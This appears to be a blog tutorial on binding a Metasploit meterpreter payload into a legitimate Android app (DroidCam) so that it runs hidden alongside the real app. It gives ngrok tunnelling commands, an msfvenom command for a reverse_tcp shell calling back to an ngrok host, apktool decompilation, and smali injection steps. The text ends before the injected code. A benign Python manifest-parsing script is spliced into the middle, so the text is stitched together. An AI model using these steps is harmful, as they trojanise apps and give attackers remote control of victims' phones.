How to bind payload with APK in 2021
Why Android?
DISCLAIMER: This tutorial/software is intended for educational purposes only. It should not be used for illegal activity. The author will not be responsible for the use thereof. Don’t be a jerk about it.
Getting Started
- Having a basic knowledge of Linux.
- Running a Debian-based system (Ubuntu, Kali Linux),
- An Original APK, I used DroidCam.
- Apktool, Ngrok, Metasploit installed.
Fire up Ngrok!
unzip /path/to/ngrok.zip
Once ngrok is unzipped you need to make ngrok executable using sudo chmod +x ngrok.
sudo chmod +x ngrok
Now we need to add our ngrok auth token; we can do this with the command below.
./ngrok authtoken <YOUR_AUTH_TOKEN>
Once the auth token has been accepted, launch ngrok using the command below. You can change the port to whatever port you want to open.
./ngrok tcp 4411
Switching on necessary services
service postgresql start
service apache2 start
Metasploit Part
- Generate android payload
msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=12553 R > payload.apk
Now we have our malicious payload ready!
- Embedding Payload
- Decompiling payload
apktool d -f payload.apk -o payload
Decompiling original
Payload.smali
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
The manifest is XML, so it uses the familiar tags and attributes. Look for an <activity> tag that contains both of these lines; you can use CTRL+F to search for them.
We can see that the entry activity is listed as com.dev47apps.droidcam.DroidCam. We know this because its <intent-filter> contains “android.intent.action.MAIN”.
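Finding the launcher activity by hand with CTRL+F works for one manifest; the same lookup as a script is what you want when triaging a decoded APK or comparing a repackaged build against the original. The following is an added example, not code from the original post: it parses a constructed sample manifest (modelled on the structure described above, not the real DroidCam manifest) with Python's standard xml.etree, returns every activity whose intent-filter carries both the MAIN action and the LAUNCHER category, and maps the class name to the smali path apktool writes for it. The function and variable names are my own.

```python
import xml.etree.ElementTree as ET

# Android manifest attributes live in this namespace; ElementTree expands
# android:name to {http://schemas.android.com/apk/res/android}name.
ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = f"{{{ANDROID_NS}}}name"

# Constructed sample of a decoded AndroidManifest.xml (not the real one).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.dev47apps.droidcam">
  <application android:label="DroidCam">
    <activity android:name="com.dev47apps.droidcam.Settings"/>
    <activity android:name="com.dev47apps.droidcam.DroidCam">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name=".CamService"/>
  </application>
</manifest>
"""


def qualify(name, package):
    """Expand shorthand component names (".Foo" or "Foo") to fully qualified ones."""
    if name.startswith("."):
        return package + name
    if "." not in name:
        return package + "." + name
    return name


def launcher_activities(manifest_xml):
    """Return fully qualified names of activities whose intent-filter has
    both the MAIN action and the LAUNCHER category (the app's entry points)."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    found = []
    for activity in root.iter("activity"):
        for flt in activity.findall("intent-filter"):
            actions = {a.get(NAME) for a in flt.findall("action")}
            categories = {c.get(NAME) for c in flt.findall("category")}
            if ("android.intent.action.MAIN" in actions
                    and "android.intent.category.LAUNCHER" in categories):
                found.append(qualify(activity.get(NAME), package))
                break  # one matching filter is enough for this activity
    return found


def smali_path(class_name):
    """Map a class name to the smali file apktool writes for it."""
    return "smali/" + class_name.replace(".", "/") + ".smali"


if __name__ == "__main__":
    for cls in launcher_activities(SAMPLE_MANIFEST):
        print(cls, "->", smali_path(cls))
```

Run it against the real decoded manifest by replacing SAMPLE_MANIFEST with the file contents; an app normally has exactly one launcher activity, so more than one result, or one that is not in the package's own namespace, is worth a closer look.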
Follow the path smali/com/dev47apps/droidcam/DroidCam.smali.
Open DroidCam.smali in your favorite text editor.
Modify the Activity EntryPoint Smali File
;->onCreate(Landroid/os/Bundle;)V
When you locate it, paste the following code on the line after it; this will start the payload alongside the original app code.